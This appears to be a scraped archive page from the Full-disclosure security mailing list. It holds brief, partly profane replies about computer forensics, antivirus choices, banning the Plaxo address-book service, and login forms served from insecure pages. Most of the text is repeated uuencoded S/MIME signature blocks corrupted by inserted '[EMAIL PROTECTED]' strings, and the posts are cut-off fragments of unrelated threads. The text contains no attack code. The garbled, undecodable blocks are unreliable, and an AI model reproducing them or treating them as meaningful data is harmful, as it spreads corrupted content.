M-Q $,6LP:3!B,0LP08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U
M;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R
M965M86EL($ESW5I;F@0T$`P]$[EMAIL PROTECTED]]PT!1 S%KHDP8C$+
M, D`U4$!A,6D$Q)3 [EMAIL PROTECTED] H3'%1H87=T92!#;VYS=6QT:6YG(A0='DI
M($QT9XQ+# [EMAIL PROTECTED] ,3(U1H87=T92!097)S;VYA;!F5E;6%I;!)W-U
M:6YG($-!`@,/1 @P#08)*H9(AO-`0$!!0`$@@$`DQ/T@7!H-1V\O;IQ
MV[EMAIL PROTECTED]:7L;.N07P\QX_J?7A^SP0\+,[EMAIL PROTECTED]
M5;GCW#)]B#2T129U'^^D(^^@:_:FJC[EMAIL PROTECTED] E%[J[HOA7D7#.L411
MF86P7Z(!,.RPIBRC'$O.PG;9WILPB2'X]P5WK7)('V:^C:(V)#%X0*S
MKFP!A)\[EMAIL
RE: [Full-disclosure] Help put a stop to incompetent computer forensics- Who the hell cares?
whitehat* shite ..., so please be so kind as to have a cup of shut the
fuck up.
I second it please discuss this offlist and don't put me or the list on CC
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL PROTECTED][EMAIL
PROTECTED], T
M2J2(;W#0$!!04`,('1,0LP08#500$P):03$5,!,`U4$!,,5V5S=5R
M;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED] H3$51H87=T92!#
M;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N(%-EG9I8V5S($1I
M=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5R[EMAIL
PROTECTED])E96UA:[EMAIL PROTECTED]
M*S [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL0'1H87=T92YC;VTP
M'A-,#,P-S$W,# P,# P6A-,3,P-S$V,C,U.34Y6C!B,0LP08#500$P):
M03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
M`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I;F@[EMAIL PROTECTED]
M#08)*H9(AO[EMAIL PROTECTED],()`H!`,2F/%5S5?M.NJ96AYHP'4$)W?
MZ?^C'NR]S?5;\AIVO7\,.F'ROU'.`=3E4 HPUP)C6BR)%7.WGP*X5:JC]Q
M5LNO/ L'Y_$?D38D*A//[EMAIL PROTECTED]]`[XK_KL8/@_0( 9-GIKN?9='%*E2%
[EMAIL PROTECTED]VT3QA!$ 9!ER8+?[`@,!``[EMAIL PROTECTED]@[EMAIL
PROTECTED]'_! @[EMAIL PROTECTED]
M_P([EMAIL PROTECTED]'1\$/# Z,[EMAIL PROTECTED]
TAC)H='1P.B\O8W)L+G1H87=T92YC;VTO
M5AA=W1E45RV]N86QF5E;6%I;$-!+F-R;# [EMAIL PROTECTED]'0\$! ,`08P*08#
M51T1!(P(*0,!PQC [EMAIL PROTECTED] ,3$5!R:79A=5,86)E;#(M,3,X, T2J
M2(;W#0$!!04``X!`$B,T5[EMAIL PROTECTED] VC9JQG#W^OK+[%Z%#EI2=?TPAN/@V
M'ZHMGS8OP/043#S]K%A8L/9.AE^A+9P#%@N=)XE4)1BQ]LG5E
MC=VIG#F.C!/95^5VO?WA];$ZN]NHTY1 :6S5-=^-6(7BW$9-=XDL=,=
M1O]=7V5/,8(#MS`[,`0$P:3!B,0LP08#500$P):03$E,,`U4$A,
M5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E
M(%!EG-O;F%L($9R965M86EL($ESW5I;F@0T$`P]$# )[EMAIL PROTECTED]@,@4`
MH(((S [EMAIL PROTECTED]]PT!0,QP8)*H9(AO-`0!,!P2J2(;W#0$)!3$/
M%PTP-3 X,3$Q-C0T-31:,,2J2(;W#0$)!#$6!!0A(*/R%Q:C++Y9 3
M_KE5ZS([EMAIL PROTECTED]]PT!1 `3%6,%0$'0`0ACVHYM=.MTD
MZM^!FA$!;0$`@ $`,# P+H$L861I='EA+F1EVAM=6MH0]N;EN92YG
M871E=V%Y+G-TF%N9VQE9YN970P9P8)*H9(AO-`0D/,5HP6# *!@@JADB
M]PT#!S .!@@JADB]PT#`@(`( P#08(*H9(AO-`P(`4 P!P8%*PX#`@P
M#08(*H9(AO-`P([EMAIL PROTECTED]@8(*H9(AO[EMAIL PROTECTED] 8)*P8!!
M-Q $,6LP:3!B,0LP08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U
M;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R
M965M86EL($ESW5I;F@0T$`P]$[EMAIL PROTECTED]]PT!1 S%KHDP8C$+
M, D`U4$!A,6D$Q)3 [EMAIL PROTECTED] H3'%1H87=T92!#;VYS=6QT:6YG(A0='DI
M($QT9XQ+# [EMAIL PROTECTED] ,3(U1H87=T92!097)S;VYA;!F5E;6%I;!)W-U
M:6YG($-!`@,/1 @P#08)*H9(AO-`0$!!0`$@@$`B:(0N/=;)3NF.V^-EL
M_*L+ET#=O0)!'W1])RCNJ\6,(R3 GS,Z2,^Y'ULT\,D7[+OMWI.+UEHM0
M10V,?5#66E^8/6?3:#,3Z LJ:_DS(Q:M,1VC/0IQ,A-Z!#\RWYGHSS;2^O/
M4')SK7Q18W9XVINDFCA*6^]0#)/M+?3M=V'5LC@)B]2D.?7TRO45W$#RP.
MN*'/6J]W:2+53GZJ+/@(SUSDQCRE.;HC;/EOWO(D]# [3-/?8.J$;/IQ
RE: [Full-disclosure] Antivirus
stopped opening any attachments they get that they don't know who they are
form and so on. As we all know the end user is the z factor in the whole
situation of choosing a good security product.
Norton is pretty good enough but I have installed clamav on winxp machines
It has a outlook plugin that keeps the malware
Both of them working together is pretty good
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL PROTECTED][EMAIL
PROTECTED], T
M2J2(;W#0$!!04`,('1,0LP08#500$P):03$5,!,`U4$!,,5V5S=5R
M;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED] H3$51H87=T92!#
M;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N(%-EG9I8V5S($1I
M=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5R[EMAIL
PROTECTED])E96UA:[EMAIL PROTECTED]
M*S [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL0'1H87=T92YC;VTP
M'A-,#,P-S$W,# P,# P6A-,3,P-S$V,C,U.34Y6C!B,0LP08#500$P):
M03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
M`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I;F@[EMAIL PROTECTED]
M#08)*H9(AO[EMAIL PROTECTED],()`H!`,2F/%5S5?M.NJ96AYHP'4$)W?
MZ?^C'NR]S?5;\AIVO7\,.F'ROU'.`=3E4 HPUP)C6BR)%7.WGP*X5:JC]Q
M5LNO/ L'Y_$?D38D*A//[EMAIL PROTECTED]]`[XK_KL8/@_0( 9-GIKN?9='%*E2%
[EMAIL PROTECTED]VT3QA!$ 9!ER8+?[`@,!``[EMAIL PROTECTED]@[EMAIL
PROTECTED]'_! @[EMAIL PROTECTED]
M_P([EMAIL PROTECTED]'1\$/# Z,[EMAIL PROTECTED]
TAC)H='1P.B\O8W)L+G1H87=T92YC;VTO
M5AA=W1E45RV]N86QF5E;6%I;$-!+F-R;# [EMAIL PROTECTED]'0\$! ,`08P*08#
M51T1!(P(*0,!PQC [EMAIL PROTECTED] ,3$5!R:79A=5,86)E;#(M,3,X, T2J
M2(;W#0$!!04``X!`$B,T5[EMAIL PROTECTED] VC9JQG#W^OK+[%Z%#EI2=?TPAN/@V
M'ZHMGS8OP/043#S]K%A8L/9.AE^A+9P#%@N=)XE4)1BQ]LG5E
MC=VIG#F.C!/95^5VO?WA];$ZN]NHTY1 :6S5-=^-6(7BW$9-=XDL=,=
M1O]=7V5/,8(#MS`[,`0$P:3!B,0LP08#500$P):03$E,,`U4$A,
M5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E
M(%!EG-O;F%L($9R965M86EL($ESW5I;F@0T$`P]$# )[EMAIL PROTECTED]@,@4`
MH(((S [EMAIL PROTECTED]]PT!0,QP8)*H9(AO-`0!,!P2J2(;W#0$)!3$/
M%PTP-3 X,3$Q-C(X,CE:,,2J2(;W#0$)[EMAIL PROTECTED]W/^?8U
MM]E]I[EMAIL PROTECTED]]PT!1 `3%6,%0$'0`0)[2-,QL]D$2B
MH:MOUG3[P$`@ $`,# P+H$L861I='EA+F1EVAM=6MH0]N;EN92YG
M871E=V%Y+G-TF%N9VQE9YN970P9P8)*H9(AO-`0D/,5HP6# *!@@JADB
M]PT#!S .!@@JADB]PT#`@(`( P#08(*H9(AO-`P(`4 P!P8%*PX#`@P
M#08(*H9(AO-`P([EMAIL PROTECTED]@8(*H9(AO[EMAIL PROTECTED] 8)*P8!!
M-Q $,6LP:3!B,0LP08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U
M;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R
M965M86EL($ESW5I;F@0T$`P]$[EMAIL PROTECTED]]PT!1 S%KHDP8C$+
M, D`U4$!A,6D$Q)3 [EMAIL PROTECTED] H3'%1H87=T92!#;VYS=6QT:6YG(A0='DI
M($QT9XQ+# [EMAIL PROTECTED] ,3(U1H87=T92!097)S;VYA;!F5E;6%I;!)W-U
M:6YG($-!`@,/1 @P#08)*H9(AO-`0$!!0`$@@$`!P+AKD8.EA1B/^AJ#Z3L
RE: [Full-disclosure] Plaxo?
Aditya Deshmukh wrote:
I need some advice about allowing plaxo running on my
internal network.
Shoud I allow it or ban it ?
Default deny.
Yes that's my kind of thinking!
If you need to ask, there is clearly _no_ need to ask...
And a hint to clueful thinking about all such services -- how can you
(or your users) assure the confidentiality of your/their
address books
if they are being stored and managed offsite?
That is not to say that such is not possible -- depending on the
standards you wish or need to maintain -- but do any of these quasi-
anonymous web-based address book managers even start to take
the kinds
of steps necessary to assure you to the level you require? And, how
can you be sure that they actually do meet those requirements? Is
their terms of service document really a sufficient basis
on which to
form such a relationship?
Certainly not!
Why should I trust anyone with my users email address books ?
And I would have to deal with the extra spam that will be generated
The only reason I even cared to ask was a part of my user population
Had been pestering me for this but and no one has install privs on their
machine... So before I ban it completely I wanted second opnions
- Thanks for clearing it up in 2 words
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL PROTECTED][EMAIL
PROTECTED], T
M2J2(;W#0$!!04`,('1,0LP08#500$P):03$5,!,`U4$!,,5V5S=5R
M;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED] H3$51H87=T92!#
M;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N(%-EG9I8V5S($1I
M=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5R[EMAIL
PROTECTED])E96UA:[EMAIL PROTECTED]
M*S [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL0'1H87=T92YC;VTP
M'A-,#,P-S$W,# P,# P6A-,3,P-S$V,C,U.34Y6C!B,0LP08#500$P):
M03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
M`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I;F@[EMAIL PROTECTED]
M#08)*H9(AO[EMAIL PROTECTED],()`H!`,2F/%5S5?M.NJ96AYHP'4$)W?
MZ?^C'NR]S?5;\AIVO7\,.F'ROU'.`=3E4 HPUP)C6BR)%7.WGP*X5:JC]Q
M5LNO/ L'Y_$?D38D*A//[EMAIL PROTECTED]]`[XK_KL8/@_0( 9-GIKN?9='%*E2%
[EMAIL PROTECTED]VT3QA!$ 9!ER8+?[`@,!``[EMAIL PROTECTED]@[EMAIL
PROTECTED]'_! @[EMAIL PROTECTED]
M_P([EMAIL PROTECTED]'1\$/# Z,[EMAIL PROTECTED]
TAC)H='1P.B\O8W)L+G1H87=T92YC;VTO
M5AA=W1E45RV]N86QF5E;6%I;$-!+F-R;# [EMAIL PROTECTED]'0\$! ,`08P*08#
M51T1!(P(*0,!PQC [EMAIL PROTECTED] ,3$5!R:79A=5,86)E;#(M,3,X, T2J
M2(;W#0$!!04``X!`$B,T5[EMAIL PROTECTED] VC9JQG#W^OK+[%Z%#EI2=?TPAN/@V
M'ZHMGS8OP/043#S]K%A8L/9.AE^A+9P#%@N=)XE4)1BQ]LG5E
MC=VIG#F.C!/95^5VO?WA];$ZN]NHTY1 :6S5-=^-6(7BW$9-=XDL=,=
M1O]=7V5/,8(#MS`[,`0$P:3!B,0LP08#500$P):03$E,,`U4$A,
M5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
RE: [Full-disclosure] Insecure http pages referencing httpsform-actions.
Today I realized that many secured web sites reference their secure
login page from an insecure page.
Now a days most of the secure WebPages have both the forms and the login
Page ref'ed
See hotmail yahoo and for insecure pages that you described man in
The middle attacks are always possible
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
